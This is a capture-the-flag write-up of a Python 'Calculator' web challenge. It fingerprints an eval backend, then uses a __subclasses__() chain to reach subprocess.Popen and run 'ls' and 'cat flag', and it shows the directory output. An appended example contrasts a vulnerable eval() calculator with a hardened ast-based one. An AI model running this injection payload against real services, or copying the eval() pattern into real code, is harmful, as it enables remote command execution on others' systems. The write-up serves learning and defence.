
[h4ckingga.me] Web Hacking - Calculator *studying the structure, studying SSTI


์Šต๊ด€์ ์œผ๋กœ ์†Œ์Šค์ฝ”๋“œ ๋จผ์ € ํ™•์ธํ•˜๊ธฐ

Saw the fake flag, groaned, and tried the attack again.


Entering 'a' 'a' prints aa, so the backend is Python or Java.

Entering True + True prints 2, which confirms Python.


''.__class__.__mro__[1].__subclasses__()

Using this expression, find the index of subprocess.Popen in the subclass list.


''.__class__.__mro__[1].__subclasses__()[<Popen index>]('<command>',shell=True,stdout=-1).communicate()

Use the expression in this form.


''.__class__.__mro__[1].__subclasses__()[213]('ls -all',shell=True,stdout=-1).communicate()


total 28
drwxr-sr-x 1 root app  4096 Aug 8 2021 .
drwxr-xr-x 1 root root 4096 Aug 8 2021 ..
-rwxrw-rw- 1 root root  243 Aug 4 2021 Dockerfile
-rwxrw-rw- 1 root root  983 Aug 2 2021 app.py
-rwxrw-rw- 1 root root   32 Aug 4 2021 flag
drwxrwxrwx 2 root root 4096 Aug 8 2021 templates


flag ํ™•์ธ ํ›„ ํ’€์ด ์™„๋ฃŒ

''.__class__.__mro__[1].__subclasses__()[213]('cat flag',shell=True,stdout=-1).communicate()
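The calculator evaluates its input as a Python expression (the title calls it SSTI, and the 'a' 'a' and True + True probes show Python semantics), which is what lets the __subclasses__() walk reach subprocess.Popen. As an added example, not the challenge's app.py, here is an eval()-based stand-in for that behaviour beside a hardened calculator that parses the input with ast and evaluates only numeric literals and arithmetic operators; unsafe_calc, safe_calc, is_rejected and MAX_EXPONENT are names assumed here.

```python
"""Added example (not the challenge's app.py): an eval()-based calculator that
reproduces the behaviour probed in the write-up, beside a hardened one that
parses the expression with ast and evaluates only arithmetic nodes."""
import ast
import operator

MAX_EXPONENT = 1000  # guard against 2 ** 99999999 tying up the worker


def unsafe_calc(expr: str):
    # Vulnerable pattern (assumed stand-in for the challenge backend): the raw
    # string is evaluated, so attribute access and calls are all reachable.
    return eval(expr)  # noqa: S307


_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _eval_node(node):
    # Only int/float literals pass; bool is excluded on purpose, so the
    # "True + True" probe is rejected rather than answered with 2.
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
            raise ValueError("exponent too large")
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Strings, names, attributes (__class__), subscripts, calls: all refused.
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_calc(expr: str):
    # mode="eval" accepts a single expression; statements fail to parse.
    return _eval_node(ast.parse(expr, mode="eval").body)


def is_rejected(expr: str) -> bool:
    # True when the hardened calculator refuses the input outright.
    try:
        safe_calc(expr)
    except (ValueError, SyntaxError):
        return True
    return False
```

Calling safe_calc on the two fingerprinting probes from the write-up raises instead of answering, so the backend no longer reveals that it is evaluating Python, let alone exposes object traversal.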
